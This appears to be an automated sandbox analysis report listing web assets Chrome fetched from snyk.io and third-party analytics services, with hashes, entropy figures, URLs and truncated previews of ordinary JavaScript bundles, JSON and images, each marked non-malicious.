                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[464],{9254:function(t,n,i){function e(t,n){var i,e;return"boolean"==typeof(null==n?void 0:n.enabled)?n.enabled:null===(e=null===(i=null==t?void 0:t.__default)||void 0===i?void 0:i.enabled)||void 0===e||e}i.d(n,{n:function(){return e}})},3162:function(t,n,i){i.r(n),i.d(n,{LegacyDestination:function(){return G},ajsDestinations:function(){return S}});var e=i(5163),r=i(4122),o=i(94),s=i(8404),a=i(1494),u=i(204),c=i(6096),l=i(9254),d=i(5944),h=i(8044),v=i(3098),f=i(3061),p=i(6338),m=i(7566),g=i(7070);function y(t){return t.toLowerCase().replace(".","").replace(/\s+/g,"-")}function w(t,n){return void 0===n&&(n=!1),n?btoa(t).replace(/=/g,""):void 0}function b(t,n,i,r){return(0,e.mG)(this,void 0,Promise,(function(){var o,s,a,u,c,l;return(0,e.Jh)(this,(function(d){switch(d.label){case 0:o=y(n),s=w(o,r),a=(0,m.Kg)(),u="".concat(a,"/integrations/").concat(null!=s?s:o,"/").concat(i,"/").conc
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4576), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4576
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.041522864674451
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:fudoTA2ERkh8juLjLBCM6nZNwMSY0X7VTNVVIg:eoTA3bu3L7LXog
                                                                                                                                                                                                                                                                                                              MD5:02F5A3E406D8439D15D0F4791E260692
                                                                                                                                                                                                                                                                                                              SHA1:DDF6B75514306244E61238E393F0396CBC53EDD2
                                                                                                                                                                                                                                                                                                              SHA-256:FFA32977A0FA17629DA75EDFF00C5AC5C5F8676DC1ADDD2DC0DE3DB7FBA0B0F9
                                                                                                                                                                                                                                                                                                              SHA-512:13FEC704F5B897AE8CFD43BD62F3FCD7D5F4EBEF31D0A3A52DA5EE821D226B1FEA830ECA557F53A6804BE14524A9038D9F65FA80212B700D23D8AC942680BC2B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://j.6sc.co/j/22d7a014-b92d-4a73-ad20-7aebe461d6e2.js
                                                                                                                                                                                                                                                                                                              Preview:!function(){window._6si=window._6si||[],window._6si.push(["setToken","50d389da3b3e04f03e03d1239ba98024"]),window._6si.push(["disableCookies",!1]),window._6si.push(["setEpsilonKey","d1c26e37d31beca9d3895cf47f60178e5fae9d81"]),window._6si.push(["enableIPv6Ping",!0]),window._6si.push(["enableIgnorePageUrlHash",!0]),window._6si.push(["enableRetargeting",!0]),window._6si.push(["setWhiteListFields",[]]),window._6si.push(["setCustomMetatags",[]]),window._6si.push(["storeTagId","22d7a014-b92d-4a73-ad20-7aebe461d6e2"]),window._6si.push(["enableEventTracking",!0]),window._6si.push(["setCompanyDetailsExpiration",!0]);for(var i=[],n=0;n<i.length;n++)window._6si.push(["addSFF",i[n]]);window._6si.push(["enableMapCookieCapture",!1]),window.dataLayer=window.dataLayer||[];var e,o;window._6si.push(["enableCompanyDetails",!0,function(i){if(""!==i){var n,e,o={},s=JSON.parse(i);if(window.dataLayer.push({company_name:s.company.name,domain:s.company.domain,country:s.company.country,address:s.company.address,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5570), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):5570
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.174184165878395
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:PPRAmpRUK5r843P4QEYxI2oWafiPHrnKnRaORlsUN:XampRUK5r8kPFEYxI2RayHrnKRauf
                                                                                                                                                                                                                                                                                                              MD5:B6BEDD960AE2867F2B15B2788B9416AC
                                                                                                                                                                                                                                                                                                              SHA1:90ADB5AE82DE7C32136972771ADDD17ADE04AF43
                                                                                                                                                                                                                                                                                                              SHA-256:F07F71A0219944B65EE2A50C34379780A3653A04934FAD49C22B34141BCA52D5
                                                                                                                                                                                                                                                                                                              SHA-512:3ADA0685EEF62587CF019FC03C6E844EAD4C2E25E96E7B89449F5F1E64FD1473339ED5828337F43D2A092E6BE2841199C99A7EBDE3E28B81F7F69815B239C447
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://trackingapi.trendemon.com/api/experience/personal?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&ExcludeUnitsJson=%5B%5D&streamId=&callback=jsonp769920&vid=2025:17297993867885496
                                                                                                                                                                                                                                                                                                              Preview:jsonp769920([{"id":115023,"orchestrationId":null,"streamId":null,"viewModelId":"172a0938-17e7-478a-a033-fc87db145d08","typeId":0,"triggers":["exit_intent"],"visibilityType":2,"groupId":null,"groupConfig":null,"contentPoolId":null,"recommendUrlParams":null,"renderMode":0,"inAbTestForVisitor":false,"displayFrequency":{"displayAgain":{"frequency":3}},"postCompletionScript":"","customImpressionTrackingCode":null,"customClickTrackingCode":null,"name":"On-Exit Popup - On-Demand Demo - on Demo page","unitSettings":{"param":{"backgroundColor":"#fff","textColor":"#322e3e","secondaryTextColor":"#7348fe","buttonBackgroundColor":"#7348fe","buttonTextColor":"#efeaff","carouselIndicatorColor":null,"scroll_depth":null},"css":"#trd_cta_{{ID}}.{{VISIBILITY}} .container-elements {\n\tflex-direction: row !important;\n\tjustify-items: center !important;\n\talign-items: center !important;\n\tbackground: #ffffff !important;\n\tborder-radius: 12px !important;\n\tpadding: 24px !important;\n}\n\n#trd_cta_{{ID}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4966), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4966
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396546111298508
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:lAAZwbFT+/hwSYDU+ZkrTnJTJT+/5wKHQY1KWU8dsZLlfPuhnxqTqQFekYo6:3mFT+/+GmkrTJTJT+/Gw1KTisllH4nxD
                                                                                                                                                                                                                                                                                                              MD5:32184F45375DF417F0C5C5F30657E84E
                                                                                                                                                                                                                                                                                                              SHA1:0A1557B78380770EE80DDAC126DDE8D70BDB909C
                                                                                                                                                                                                                                                                                                              SHA-256:CAF93B54F26165ED6F24BE571848AA441268C2992A3416F0EB95655763343E91
                                                                                                                                                                                                                                                                                                              SHA-512:80FF21D30517A5B1B68450A81CD3BD0CDBFACE37F3097AF4AF179C9225E73EE4E861F630F1D062CBF267367FBC5FEFEEE2F6D2027B90F4B35DD4C2F996A987C7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/pages/%5B...slug%5D-06f8921baae0411a.js
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[330],{29792:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[...slug]",function(){return l(52538)}])},11223:function(e,n,l){"use strict";var i=l(85893),o=l(5152),d=l.n(o),a=l(45697),t=l.n(a),s=l(9981),r=l(23751);let u=d()(()=>l.e(572).then(l.bind(l,40572)),{loadableGenerated:{webpack:()=>[40572]}}),c=d()(()=>Promise.all([l.e(6122),l.e(3602)]).then(l.bind(l,3602)),{loadableGenerated:{webpack:()=>[3602]}}),v=d()(()=>l.e(5662).then(l.bind(l,65662)),{loadableGenerated:{webpack:()=>[65662]}});function b(e){var n,l,o,d,a,t;let{component:b}=e,p=(0,r.bU)(),{sys:f,fields:h}=b,m={moleculeAlert:u,organismFeatureCta:c,organismFooterCta:v,DEFAULT:(0,i.jsx)("section",{className:"brandui-section",children:(0,i.jsx)("div",{className:"brandui-container",children:(0,i.jsxs)("p",{className:"pad-small bg-base-rose txt-fail radius-large",children:[(0,s.t)("errorRendering",p)," ",(0,i.jsx)("strong",{children:null==f?void 0:null===(l=f.co
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (35552), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):35552
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.272922801597397
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:zeUUsSi7WTPK47rBtSTECq0XBkpurOMiQvNvvFJcXkryfGvWzo2t8YnO676kg5+n:pYichBgol0XadAvFgOvHzUW7S
                                                                                                                                                                                                                                                                                                              MD5:C6F58DD3D60F07462254B842DD4F9CA1
                                                                                                                                                                                                                                                                                                              SHA1:62C507FC6CC05F9732BCD5C593F3D8D0E0A3D7E2
                                                                                                                                                                                                                                                                                                              SHA-256:2A8A441D8086F20A64563EDC759ABA1DE84D932E34FF77B8BB0279A730CDB428
                                                                                                                                                                                                                                                                                                              SHA-512:21BF35D36D4859188BF32B21F84B71975B72503C72F5B64D7AB98CEFB58045F3F991960CAF9E8BCC95CDC284C6758DB639B4087750206450076263677CA4513B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/9.4a3e9801.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{"+MLx":function(t,e,n){var r=n("HAuM");t.exports=function(t,e,n){if(r(t),void 0===e)return t;switch(n){case 0:return function(){return t.call(e)};case 1:return function(n){return t.call(e,n)};case 2:return function(n,r){return t.call(e,n,r)};case 3:return function(n,r,o){return t.call(e,n,r,o)}}return function(){return t.apply(e,arguments)}}},"/GqU":function(t,e,n){var r=n("RK3t"),o=n("HYAF");t.exports=function(t){return r(o(t))}},"07d7":function(t,e,n){var r=n("busE"),o=n("sEFX"),i=Object.prototype;o!==i.toString&&r(i,"toString",o,{unsafe:!0})},"0BK2":function(t,e){t.exports={}},"0Dky":function(t,e){t.exports=function(t){try{return!!t()}catch(e){return!0}}},"0GbY":function(t,e,n){var r=n("Qo9l"),o=n("2oRo"),i=function aFunction(t){return"function"==typeof t?t:void 0};t.exports=function(t,e){return arguments.length<2?i(r[t])||i(o[t]):r[t]&&r[t][e]||o[t]&&o[t][e]}},"0eef":function(t,e,n){"use strict";var r={}.propertyIsEnumerable,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1896), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1896
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.298303894686635
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:ibj41U+IRWczoSxw9YzrjXrBv5joWlw97WsqnFGWRfUoSxnnzbbxD1TFSAkJWMej:ibk1U+RrkrZdqVWsrWzZW//eb/pB8
                                                                                                                                                                                                                                                                                                              MD5:3157CFE467F518FA1B9E43042FD8985F
                                                                                                                                                                                                                                                                                                              SHA1:74827506BD35F1448D4C08DC262D1DB35E102925
                                                                                                                                                                                                                                                                                                              SHA-256:0799EE4F469E48C9983E2885FAC4682313DB54DCE89195FEA153D730943BB0BD
                                                                                                                                                                                                                                                                                                              SHA-512:226FA1A955CC59C72A0ABF8B69CA3E9705C9790BFF0F278B69A3FD833BD3F9C87B9D869C922A5F81532EC73586B3A6F28875CCCE0A9FB34E01DAED805D21C142
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/8796.579c4548d83cb2ef.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8796],{96059:function(l,i,a){a.d(i,{Z:function(){return c}});var e=a(85893),n=a(45697),r=a.n(n),s=a(7756),t=a(44133);function o(l){var i;let{image:a,isSmall:n,hasMinHeight:r,objectFit:o="cover",priority:c,noRadius:d,className:u}=l;return(0,e.jsx)("div",{className:(0,t.Z)("w-full marg-h-auto p-relative aspect-ratio-banner",r&&"min-h-2",u),"data-component":"Banner",children:a&&(0,e.jsx)(s.Z,{src:null==a?void 0:a.src,alt:null!==(i=null==a?void 0:a.alt)&&void 0!==i?i:"",fill:!0,sizes:null==a?void 0:a.sizes,priority:c,className:(0,t.Z)("object-fit-".concat(o),!d&&(n?"radius-medium":"radius-large"))})})}o.propTypes={image:r().shape({src:r().string,alt:r().string}),isSmall:r().bool,hasMinHeight:r().bool,priority:r().bool,objectFit:r().oneOf(["cover","contain","fill","scale-down","none"])};var c=o},78796:function(l,i,a){a.r(i);var e=a(85893),n=a(24982),r=a(96059);i.default=function(l){var i,a,s,t;let{item:o}=l;return(0,e.jsx
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1835
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.793123247511683
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHpdS3SKtHkseWPQQNnQ1LSGlIgBehPDvkL7x6Y0iHSmMXuNn4:tTNKtEG4OnMeczBehPDvkL7kY0iHS2N4
                                                                                                                                                                                                                                                                                                              MD5:8DACA7E065438A8D85CE019C780F03B2
                                                                                                                                                                                                                                                                                                              SHA1:BC8AA7CF2ED629517E29AAB6967968391E837F54
                                                                                                                                                                                                                                                                                                              SHA-256:EB8A6C0081E8B9E09B8896346277408227046A2F2A603395B2917B29ED4850BC
                                                                                                                                                                                                                                                                                                              SHA-512:4FEB67502CA2665A6C189F8F6A230BC318993446AB8EF0E43CE5DB54165F9EB302A2900449877D6E7F8B3BC7653BC81CAB01C26539AB56C85D37B20997638BCA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="4" x2="59.8364" y1="4" y2="49.0471"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="22" x2="66.7059" y1="22" y2="33.1765"><stop offset="0" stop-color="#ff78e1"/><stop offset="1" stop-color="#d54570"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.124 59.9867c.1247.0177.2513.0177.376 0 .1247.0177.2513.0177.376 0 .435-.1455.8636-.2952 1.2858-.449-6.1072-3.913-10.1618-10.7595-10.1618-18.5377 0-12.1335 9.8665-22 22-22 3.5984 0 6.9974.8678 9.9988 2.4051v-9.1945c.0118-.2571-.0624-.5108-.2112-.7216-.1488-.2107-.3637-.3668-.6113-.4437l-22.3238-6.99163c-.2295-.07156-.4755-.07156-.705 0l-22.32381 6.99163c-.24758.0769-.46252.233-.6113.4437-.14878.2108-.22302.4645-.21116.7216v13.9832c0 17.7937 7.343
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1394608760283615
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YRKOAzmTIUEddcTpf4:YYYpEdCpA
                                                                                                                                                                                                                                                                                                              MD5:7DE8BA80A132C433C6B741AFCFCD1835
                                                                                                                                                                                                                                                                                                              SHA1:BBD9F056F0981117733D6D3E8D6AF9B9878C401A
                                                                                                                                                                                                                                                                                                              SHA-256:1759576FE26BEA12092335D8CA73D23626A563945E52CB859A58B3206AA4D9A8
                                                                                                                                                                                                                                                                                                              SHA-512:D84FAE5EAC9CA27F3FACB2D5245546EB9BAF647F7B2E7790F0504E3DB45D2EBF1DD048DCFBD159AAC69868DF8FA72960557E1E0A701125C65C2F29D4F87946C3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://scout.salesloft.com/i
                                                                                                                                                                                                                                                                                                              Preview:{"token":"cf22ca0d-1a32-4622-bfc6-ca2fee71c13a"}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51619), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):51642
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.147401120253968
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:+Q9JeV+ArVHyH6EMVvpxl+fm9re9PE8waMe:hKSHaXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:3A8D4E0F5FC5A96861FEEFAB18BE6A6B
                                                                                                                                                                                                                                                                                                              SHA1:4F31A370D3717F9CFF51B9DED9B58EBFE0A6BB54
                                                                                                                                                                                                                                                                                                              SHA-256:5D07AB9E1430826E8813040CCAC5D68C17C85E35183C5D4215A4F38671D88C10
                                                                                                                                                                                                                                                                                                              SHA-512:A7D86904B772B96A64EBE793932E252EEBC4E9FCD1DF7447D0750D7FDFE72FACA812D321A8689EED0A7F347A6DA4C371A41B8F1ED49FF39A447C0A143058F280
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/government-security-solution.json?slug=government-security-solution
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5MPyv02nAnOs2vZxTtINIG","type":"Entry","createdAt":"2022-11-09T21:48:22.179Z","updatedAt":"2024-07-24T13:59:39.232Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":35,"revision":7,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk for Government page","title":"Snyk for Government | Snyk","slug":"government-security-solution","uri":"government-security-solution","seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7MV4tcfqwZiDCp6kkznUOP","type":"Entry","createdAt":"2022-11-09T21:48:22.325Z","updatedAt":"2023-04-12T02:06:58.890Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":16,"re
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4811), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4811
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396407048183825
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ZAUZCx6KT+/hwSYDU+ZErTnxJT+/5wKH2nnXKe3njf46:fC6KT+/+GmErTxJT+/GwYX5njg6
                                                                                                                                                                                                                                                                                                              MD5:5ADB5C06066458D65349CC117A3022FE
                                                                                                                                                                                                                                                                                                              SHA1:F843F758F4E4FFF4F50485CA7D3AD19178DF3042
                                                                                                                                                                                                                                                                                                              SHA-256:B8CC387E7C1904761DEB1CF2BB0488342FEAF71197E1951D69496641F38690C0
                                                                                                                                                                                                                                                                                                              SHA-512:F5C8284F9112CFE32B80B9EC25160C0116B8EA894090411452A07C186768E74423943B0286367E59B28F09566FBD1D75EFF40B719A483C423590A27B80949797
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[935],{83342:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/schedule-a-demo",function(){return l(35573)}])},11223:function(e,n,l){"use strict";var i=l(85893),o=l(5152),d=l.n(o),a=l(45697),t=l.n(a),s=l(9981),r=l(23751);let c=d()(()=>l.e(572).then(l.bind(l,40572)),{loadableGenerated:{webpack:()=>[40572]}}),u=d()(()=>Promise.all([l.e(6122),l.e(3602)]).then(l.bind(l,3602)),{loadableGenerated:{webpack:()=>[3602]}}),v=d()(()=>l.e(5662).then(l.bind(l,65662)),{loadableGenerated:{webpack:()=>[65662]}});function b(e){var n,l,o,d,a,t;let{component:b}=e,p=(0,r.bU)(),{sys:f,fields:h}=b,m={moleculeAlert:c,organismFeatureCta:u,organismFooterCta:v,DEFAULT:(0,i.jsx)("section",{className:"brandui-section",children:(0,i.jsx)("div",{className:"brandui-container",children:(0,i.jsxs)("p",{className:"pad-small bg-base-rose txt-fail radius-large",children:[(0,s.t)("errorRendering",p)," ",(0,i.jsx)("strong",{children:null==f?void 0:null===(
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (7679), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):7696
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0792630464822235
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ecK09NPkPYqzkPlB/j29pSQBU9zewTTedcPBRcn9F6P8e:mkr2/UJne+gnWP8e
                                                                                                                                                                                                                                                                                                              MD5:9FED311682B66D7BA1096EDA4A5281A7
                                                                                                                                                                                                                                                                                                              SHA1:467A792F0CADBB1ACA46CDB6A2944C4EEA29765A
                                                                                                                                                                                                                                                                                                              SHA-256:6CC5640D63AA6F4EA387E0D2BB602A2BA664F91CFFE81689A8A24A2F306F9AFD
                                                                                                                                                                                                                                                                                                              SHA-512:27C4678F0F6B27A5FCCC576CED889A9D4B3EAEE130CC80B22A172F9144D8F6597CDE5FE986EFDD15C5F2256FE7398A9CDF0DC85D480ECAF5AB4E10D65F6285C8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[{"sys":{"type":"Link","linkType":"Tag","id":"displayOnSecurityResourcesPage"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicAi"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicApplicationSecurity"}},{"sys":{"type":"Link","linkType":"Tag","id":"typeReportsPapers"}},{"sys":{"type":"Link","linkType":"Tag","id":"typeWhitePaper"}}],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4wPKXhdmkBuVXBOMnFo272","type":"Entry","createdAt":"2024-08-05T19:13:50.161Z","updatedAt":"2024-08-26T19:25:03.885Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":15,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateLandingPage"}},"locale":"en-US"},"fields":{"internalName":"SAST essentials for AI-generated code: A security leader.s handbook - Landing page","title":"SAST essentials for AI-generated code: A security leader.s ha
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2411
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.324430833200286
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:tkiPOLlcV/5d/wL8+DEMH4poa+lwPdS56Vu3vg2z0lB:bRn68+DEMHAPdu/b0L
                                                                                                                                                                                                                                                                                                              MD5:F0AEC3D00D180B1294B77D6E7E7A124B
                                                                                                                                                                                                                                                                                                              SHA1:518431116B14C96F715E780D409A697B0D45EB4A
                                                                                                                                                                                                                                                                                                              SHA-256:EBFCB51B79A0088359C319066A09EC0F870D2D8997BAD10F435EC6B5006A2FEA
                                                                                                                                                                                                                                                                                                              SHA-512:6580E999EE2960B45CDE8227E98C48FD8DB746FCB5194096ABB6A57E3C32A695F1B78AFEA6C5FFB7B1FE6FA65998C3D91C2E6803E261CD390A7721985DE66B72
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1713192738/website-customer-logos/logo-jaguar-land-rover-corporate.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="55" height="48" viewBox="0 0 55 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_13037_2524)">.<path d="M3.48498 18.9883C3.48498 31.7793 3.48172 38.0396 3.47412 38.1699C3.40572 39.3533 3.1408 40.4173 2.67177 41.3825C2.48394 41.769 2.30588 42.0546 2.00731 42.452C1.71307 42.8439 1.46553 43.1251 1.09529 43.4888C0.771748 43.8059 0.485116 44.0491 0.146369 44.2923C0.0063099 44.3932 -0.000204458 44.3998 0.01391 44.4215C0.0225958 44.4334 0.526373 45.2434 1.13438 46.2194C1.74239 47.1955 2.24074 47.9968 2.24291 47.9989C2.24834 48.0044 2.66743 47.7232 2.83897 47.5983C3.70973 46.9632 4.49471 46.214 5.15809 45.3834C6.55107 43.6398 7.44246 41.5617 7.73452 39.3794C7.766 39.147 7.78772 38.932 7.81377 38.6193C7.83115 38.4109 7.83332 37.1764 7.83549 19.1979L7.83875 3.14224e-05H5.66186H3.48498V18.9883Z" fill="black"/>.<path d="M16.709 20.2922V40.5845H28.88C35.5746 40.5845 41.051 40.5823 41.051 40.579C41.051 40.5736 38.5701 36.5456 38.4822 36.4066L38.4452 36.3501H29
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 17 x 17, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):386
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.726320581783242
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:6v/lhP6Dlfy6fy2ieBYI4bl0OIFfJIzYxUurBOvgJA3NXV+nI5tsup:6v/7KHqPyYBl0OMdlkvgOmnWN
                                                                                                                                                                                                                                                                                                              MD5:7DA2AE17C3B671047838F7B78687A56F
                                                                                                                                                                                                                                                                                                              SHA1:ADE29E47143CF20C4A2FB6B182D284A439C43BE6
                                                                                                                                                                                                                                                                                                              SHA-256:C3A58E45CCFFFECE1DF8E470FD853A81321E4F78F6AF8D22E78310DA1380F7D5
                                                                                                                                                                                                                                                                                                              SHA-512:0C860BB872A4A14D2F6B6B13D8594A6C0B4F5D120925B4E1868F58BEE8DB009F0969D7577CB3D3913F22CA658EAAA805991A4B1C55C3792D532DDA2E68D1B34F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://pic.trendemon.com/images/closex.png
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................rPLTE..................................................................................................................U..`...%tRNS.....E..4...cV@......wP/(......{n<VA.F....IDAT..m.Y..0.C......uou.+bg2|..[...Dg...]Ww..}..`<.....C.O.......d.....~n/b.Y%.'.r.,.(..!..........*..z..*M.@c...-......e.........^B.7..b..E.f-..cNf:..{...-.......IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.015695539205614
                                                                                                                                                                                                                                                                                                              Encrypted:false
